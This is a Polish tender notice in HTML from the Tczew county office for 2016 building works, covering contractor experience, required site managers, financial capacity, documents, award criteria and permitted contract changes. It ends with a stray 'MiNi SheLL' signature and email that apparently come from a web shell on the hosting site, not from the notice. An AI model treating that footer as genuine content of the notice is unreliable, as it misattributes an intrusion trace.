<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: a)	co najmniej 1 (jedną) robotę budowlaną polegającą na budowie lub przebudowie budynku wraz z wykonaniem instalacji elektrycznej i sanitarnej, o wartości zamówienia: min. 350 000,00 zł brutto (słownie złotych: trzysta pięćdziesiąt tysięcy 00/100)
lub
b)	co najmniej 2 (dwie) roboty budowlane polegające na budowie lub przebudowie budynku wraz z wykonaniem instalacji elektrycznej i sanitarnej, o wartości tych zamówień każdorazowo min. 175 000,00 zł brutto (słownie złotych: sto siedemdziesiąt pięć tysięcy 00/100).
ZASTRZEŻENIE: Zgodnie z celowościową wykładnią odnoszącą się do art. 26 ust. 2b Ustawy dotyczącego polegania na zasobach podmiotu trzeciego, Zamawiający wymaga, aby spełnienie warunku określonego w art. 22 ust. 1 pkt 2 Ustawy poprzez udostępnienie przez podmiot trzeci swojego zasobu wiedzy i doświadczenia miało charakter faktyczny, pozwalający na jego realne wykorzystanie przez okres wykonywania niniejszego zamówienia, a zatem w konsekwencji wiązało się z rzeczywistym udziałem tego podmiotu w realizacji zamówienia w części, dla której nastąpiło udostępnienie wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, a mianowicie: 4.3.2.1	1 (jedną) osobą na stanowisko kierownika budowy w specjalności/branży konstrukcyjno-budowlanej, posiadającą:
a)	wymagane uprawnienia, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej kierowanie robotami w specjalności/branży konstrukcyjno-budowlanej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
b)	co najmniej 3 lata doświadczenia zawodowego na stanowisku kierownika budowy lub kierownika robót przy realizacji robót budowlanych w branży konstrukcyjno-budowlanej. 
4.3.2.2	1 (jedną) osobą na stanowisko kierownika robót w specjalności/branży sanitarnej, posiadającą:
a)	wymagane uprawnienia, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej kierowanie robotami w specjalności/branży sanitarnej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
b)	co najmniej 2 lata doświadczenia zawodowego na stanowisku kierownika budowy lub kierownika robót przy realizacji robót budowlanych w branży sanitarnej,
4.3.2.3	1 (jedną) osobą na stanowisko kierownika robót w specjalności/branży elektrycznej, posiadającą:
a)	wymagane uprawnienia, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej kierowanie robotami w specjalności/branży elektrycznej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
b)	co najmniej 2 lata doświadczenia zawodowego na stanowisku kierownika budowy lub kierownika robót przy realizacji robót budowlanych w branży elektrycznej. UWAGI:
1.	Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające mu kwalifikacje zawodowe/dokumenty uprawniające do wykonywania samodzielnych funkcji technicznych w budownictwie/wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art. 12a i innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2016 r., poz. 290) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65).
2.	Przez posiadanie wymaganych uprawnień, Zamawiający rozumie legitymowanie się przez osoby wskazane do pełnienie poszczególnych funkcji w zakresie pkt 4.3.2 SIWZ, odpowiednimi uprawnieniami budowlanymi w wymaganym przez Zamawiającego zakresie oraz posiadanie aktualnych zaświadczeń o wpisie na listę członków właściwej izby samorządu zawodowego - dokumentu, który  zgodnie z art. 12 ust. 7 ustawy z dnia 7 lipca 1994 r. Prawo budowlane stanowi podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie.
3.	Przez wymagane doświadczenie zawodowe należy rozumieć lata czynnie przepracowane na danym stanowisku przy realizacji robót budowlanych w danej branży. Niniejsze oznacza, że: - osoba na stanowisko kierownika budowy w specjalności/branży konstrukcyjno-budowlanej musi posiadać doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika robót przy realizacji robót budowlanych w branży konstrukcyjno-budowlanej, w łącznym okresie co najmniej 3 lat, - osoby na stanowisko, odpowiednio: kierownika robót w specjalności/branży sanitarnej oraz elektrycznej muszą posiadać doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika robót przy realizacji robót budowlanych w odpowiedniej dla danego stanowiska branży: sanitarnej bądź elektrycznej, w łącznym okresie co najmniej 2 lat.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową w kwocie co najmniej 300 000,00 PLN (słownie złotych: trzysta tysięcy 00-100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga od Wykonawcy wskazania w wykazie (sporządzonym według wzoru, stanowiącego Załącznik Nr 1D do SIWZ) wykonanie co najmniej 1 (jednej) roboty budowlanej polegającej na budowie lub przebudowie budynku wraz z wykonaniem instalacji elektrycznej i sanitarnej, o wartości zamówienia min. 350 000,00 zł brutto lub co najmniej 2 (dwóch) robót budowlanych, polegających na budowie lub przebudowie budynku wraz z wykonaniem instalacji elektrycznej i sanitarnej, o wartości tych zamówień każdorazowo min. 175 000,00 zł brutto;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>5.1.7.1	Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa w art. 22 ust. 1 pkt 4 Ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy, oprócz pisemnego zobowiązania o którym mowa w pkt 5.1.7 SIWZ, dla warunku dotyczącego sytuacji finansowej (opisanego w pkt 4.3.3 SIWZ) - wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawionej nie wcześniej niż 3 m-ce przed upływem składania ofert.
Jeżeli z uzasadnionej przyczyny Wykonawca nie jest w stanie przedstawić dokumentów wymaganych przez Zamawiającego, o których mowa w pkt 5.1.7.1 SIWZ dotyczących sytuacji finansowej, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanych przez Zamawiającego warunków.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.1.7	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy będzie polegać na zasobach podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy, w celu oceny, iż będzie dysponował tymi zasobami niezbędnymi do realizacji zamówienia, Wykonawca winien przedstawić w szczególności pisemne zobowiązania tych podmiotów (przedstawione w oryginale) do oddania mu do dyspozycji zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zamawiający wymaga, aby składany dokument w szczególności zawierał informacje: - jaki rodzaj zasobu jest udostępniany, - w jakiej formie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia (np. podwykonawstwo, konsultacje itp.), - w jakim okresie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia, - jaki stosunek łączy Wykonawcę z podmiotem udostępniającym zasób (np. umowa zlecenie, umowa o współprace itp.).
Wzór treści zobowiązania stanowi Załącznik Nr 1G do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja jakości i rękojmi za wady - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany postanowień niniejszej umowy mogą być dokonane, za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, w następujących przypadkach:
1) 	zmiany osoby: kierownika budowy, kierownika robót - polegającą na wyznaczeniu nowej osoby pełniącej daną funkcję, pod warunkiem spełniania przez tą nową osobę odpowiednich postanowień SIWZ;
2)	zmiany lub przedłużenia terminu wykonania robót w przypadkach:
a)	natrafienia na różnego rodzaju wykopaliska (zabytki) i związaną z tym koniecznością prowadzenia prac archeologicznych,
b)	konieczności dokonania zmian w dokumentacji projektowej o czas niezbędny do dokonania zmian w projekcie oraz ewentualnie o czas niezbędny dla dostosowania się Wykonawcy do takiej zmiany,
c)	konieczności wykonania robót zamiennych, o których mowa w pkt. 6), o czas niezbędny na ich realizację; 
d)	konieczności poprawy warunków wykonywania robót zagrażających bezpieczeństwu o czas niezbędny do dokonania ich poprawy, jeżeli warunki zagrażające bezpieczeństwu powstały bez winy Wykonawcy;
e)	niezależnego od stron umowy przedłużania się okresu trwania procedur prowadzonych przez organy administracji publicznej lub inne podmioty                       - właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji robót budowlanych;
f)	konieczności wszczęcia dodatkowych procedur prowadzonych przez organy administracji publicznej lub inne podmioty właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji robót budowlanych;
g)	niezależnego od Wykonawcy przedłużania się okresu trwania dostawy trudnodostępnych, wymagających zamówienia materiałów niezbędnych do prawidłowej realizacji robót budowlanych;
h)	uzasadnionego wstrzymania danych robót przez kierownika budowy wraz z wpisem do dziennika budowy o czas na jaki nastąpiło wstrzymanie danych robót. Uzasadnienie to winno być potwierdzone przez Nadzór inwestorski;
i)	wystąpienia siły wyższej, o której mowa w pkt. 7);
3)	decyzji Wykonawcy, za uprzednią zgodą Zamawiającego, o zleceniu określonego zakresu robót podwykonawcom, pomimo iż w swojej ofercie przetargowej Wykonawca oświadczył, że zamierza pełen zakres robót budowlanych wykonać własnymi siłami;
4)	zmiany podwykonawcy, za uprzednią zgodą Zamawiającego oraz pod warunkiem spełniania przez nowego podwykonawcę określonych postanowień SIWZ;
5)	konieczności zmiany kwoty podatku VAT, w związku ze zmianą powszechnie obowiązujących przepisów prawnych, w szczególności przepisów podatkowych dotyczących obowiązującej wysokości (stawki) podatku VAT;
6)	konieczności wykonania robót zamiennych:
a)	w sytuacji zaistnienia obiektywnej niemożliwości wykonania robót zgodnie 
z projektem budowlanym, spowodowanej warunkami terenowymi istniejącymi na placu budowy lub zaplanowanym złym doborem materiałów, technologii w trakcie robót budowlanych, napotkaniu niezinwentaryzowanych lub błędnie zinwentaryzowanych instalacji podziemnych, dla których zachodzi potrzeba ich przebudowy lub naprawy albo innymi błędami projektowymi - pod warunkiem zatwierdzenia tych zmian przez projektanta i Nadzór inwestorski. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
b)	w sytuacji zaistnienia możliwości wprowadzenia lepszych rozwiązań technologicznych lub lepszych materiałów w stosunku do zaprojektowanych, pod warunkiem zatwierdzenia tych zmian przez autora projektu i Nadzór inwestorski, a nowe rozwiązania są korzystne dla Zamawiającego. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
c)	w przypadku powstania niezgodności dokumentacji projektowej ze stanem faktycznym powodującej, że realizacja zgodnie z dokumentacją projektową wiązałaby się z niegospodarnością, a nowe rozwiązania zapobiegałyby tej niegospodarności, pod warunkiem zatwierdzenia tych zmian przez autora projektu i Nadzór inwestorski. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
d)	w sytuacji zaistnienia obiektywnej niemożliwości wykonania robót zgodnie z projektem budowlanym, spowodowanej natrafieniem na różnego rodzaju wykopaliska (zabytki) i związaną z tym koniecznością prowadzenia prac archeologicznych albo siedlisk ptaków lub innych zwierząt podlegających ochronie i związaną z tym potrzebą uruchomienia stosownych działań i procedur, pod warunkiem zatwierdzenia zmian przez autora projektu. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
e)	konieczności wprowadzenia zmian umowy w następstwie zmian wytycznych lub zaleceń Instytucji, która przyznała środki na dofinansowanie przedmiotu umowy;
7)	konieczności wprowadzenia zmian umowy w następstwie siły wyższej, tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia (niemożliwość zapobieżenia nie tyle samemu zjawisku, co jego następstwom), w tym m.in. katastrofa naturalna, katastrofalne działanie przyrody, np. niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, wojna, atak terrorystyczny, np. w zakresie wykonania robót zamiennych, rozwiązań zamiennych.
2.	Dopuszcza się, za zgodą jednego z Przedstawicieli Zamawiającego, zmianę załączników do umowy (załączniki od 1 do 5) w zakresie: formatowania, doprecyzowania, dostosowania do specyfiki zamówienia. Zmiany te nie mogą zaburzać równowagi ekonomicznej pomiędzy Zamawiającym a Wykonawcą, jednocześnie wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie może wpłynąć na krąg podmiotów ubiegających się o to zamówienie ani na wynik postępowania. Udokumentowanie zmiany następować będzie na podstawie protokołu podpisanego przez Wykonawcę, Nadzór inwestorski i jednego z Przedstawicieli Zamawiającego.
3.	Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> przetargi.powiat.tczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Tczewie, woj. pomorskie kod 83-110, ulica Piaskowa 2, pok. nr 319.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2016 godzina 10:00, miejsce: Starostwo Powiatowe w Tczewie, woj. pomorskie, kod: 83-110, ulica Piaskowa 2, w Biurze Obsługi Klienta w pokoju nr 04.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com